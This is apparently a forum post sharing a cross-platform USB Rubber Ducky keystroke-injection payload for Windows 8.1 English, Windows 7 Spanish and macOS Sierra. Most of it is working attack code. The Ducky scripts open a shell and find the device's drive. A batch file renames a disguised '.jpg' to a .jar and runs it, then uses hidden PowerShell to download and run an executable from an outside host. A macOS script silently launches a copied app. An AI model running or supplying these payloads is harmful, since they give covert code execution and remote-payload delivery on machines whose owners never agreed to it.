USB Rubber Ducky Cross-platform payload (Win 8.1 Eng, Win 7 Esp, and macOS Sierra 10.12.1 Eng)

[Mohamed A. Baset]

Hi Guys, Hola Chicos

 

Without long introductions, I'm a big fan of Rubber Ducky, BadUSB techniques, Automation stuff, etc..

Long time ago i was working hard to get the ideal cross-platform payload which works:

1. Cross-OSes

2. Cross-keyboard layouts (not all of them currently)

As we all know in a the rubber ducky dual mode (Keyboard + Mass storage) we can't *that easy* to get the drive letter dynamically and all you have to do to execute this command line:
 

for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d

This command line loops the current drives letters and finds the one which have the name "DUCKY" then assigns the variable "duck" to its drive letter, after that the %duck% variable will always be pointing to the USB Rubber Ducky drive letter.

Cool!

Simulating and Writing this command line on some OSes keyboard layouts is a big HEADACHE, Writing (', |, ", ^, etc..) is an Ughhhh a big mess, I wished that USB Rubber Ducky had a copy paste from any source but what we can do, it is a keyboard and we are functionally limited here!

Spanish guys know about the big headache of pressing "AltGr" key to get some symbols like @#^ and the only way to simulate this is by modifying the kb layout and add some ascii codes and stuff then rewriting the ducky script etc.. so this topic is for you guys to jump over it, Cheers!

The Windows part (Win 8.1 Eng & Win 7 Esp)
So i came up with an idea (a tiny but cool one) that allowed me to execute one payload on both Windows 8.1 English UI/Kb Layout and Windows 7 Español UI/Kb Layout and for an extra fun I added some codes to achieve the same on macOS Sierra (a cool way to execute something from Ducky mass storage without the headache of the drive letter and later i will explain why), Here we go:
 

DEFAULT_DELAY 75
DELAY 1000
WINDOWS r
DELAY 1000
STRING cmd
ENTER
DELAY 1000
STRING for %p in 
DELAY 10
SHIFT 8
STRING A B C D E F G H I J K L M N
DELAY 100
STRING  O P Q R S T U V W X Y Z
DELAY 10
SHIFT 9
DELAY 100
STRING do %p
DELAY 10
SHIFT .
SHIFT 7
STRING r.bat
ENTER
DELAY 100
STRING for %p in 
DELAY 100
STRING (A B C D E F G H I J K L M N
DELAY 100
STRING  O P Q R S T U V W X Y Z)
DELAY 100
STRING do %p:/r.bat
ENTER

You guys don't need me for sure to explain each step but i will only explain the highlights:
1. I'm looping (in a hard coded way) all the drive letters connected to the machine to find our ONE and execute ANYTHING from a stored .bat file (possibilities are endless here to do what you want)

2. The loop mentioned above is executed twice, First on a Spanish (latin) keyboard layout and you can notice that when i used the "SHIFT 8" key combinations to simulate "(" and "SHIFT 9" to simulate ")" to achieve the command line:

for %p in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z)do %p:/symbiansymoh.bat

 

So, a "for" loop to execute a bat file and this loop will be executed twice (one time for english kb layout and the other is for the spanish kb layout)

You can put anything inside this symbiansymoh.bat file but for satisfying your curiosity guys here's my content:
 

@echo off
color 10
REM Getting our drive letter which have the name SYMB assign to symb
for /f %%d in ('wmic volume get driveletter^,  label ^| findstr "SYMB"')do set symb=%%d
REM Copy a NOTmalicious file to the temp folder
copy %symb%\Executables\NOTmalicious.jpg %tmp%\NOTmalicious.jar /y
REM Executing the NOTmalicious file
start %tmp%\NOTmalicious.jar
REM Downloading and executing another NOTmalicious file
powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('https://www.BlahBlahBlah.com/Whatever.exe','%TEMP%\Whatever.exe'); Start-Process "%TEMP%\Whatever.exe"
REM Goodbye
exit

It doesn't matter now what language the machine you're executing the bat file on.

 

The macOS part (English KB Layout)

The macOS part is the best and a kind of no brainer here, As you may know Linux, Unix and Linux/Unix-like OSes uses and identifies USB storages by its NAME not LETTER (There's nothing called letters in this beautiful and lovely world)

So sending the key combinations to fire the spotlight search then opening the terminal is so freaking easy, then navigating to "/Volumes/[DRIVE_NAME]/", Giving the bash file "symbiansymoh.sh" the executing priveleges (Chmod +X) then executing it which also do ANYTHING from a stored .sh file (possibilities are endless here to do what you want) << copy paste  

 

DEFAULT_DELAY 75
DELAY 1000
GUI SPACE
DELAY 500
STRING terminal
DELAY 100
ENTER
DELAY 500
STRING chmod +X  /Volumes/SYMB/symbiansymoh.sh
ENTER
DELAY 100
STRING nohup sh /Volumes/SYMB/symbioansymoh.sh &>/dev/null &
ENTER
DELAY 100
GUI q
DELAY 300
ENTER

And again for feeding your curiosity here's the content of my symbiansymoh.sh file:

#!/bin/bash
rm -r /tmp/NOTmalicious.app;
cp -R /Volumes/SYMB/NOTmalicious /tmp/NOTmalicious.app;
open /tmp/NOTmalicious.app;

that copies a stored NOTmalicious.app file to the temp folder then executes it.

 

Here's a PoC video demonstrates the blah blah blah above: https://www.youtube.com/watch?v=YHzcI42dFOI

The topic is open to discussion, Any ideas, modification is always welcome!

Cheers and have a great weekend guys!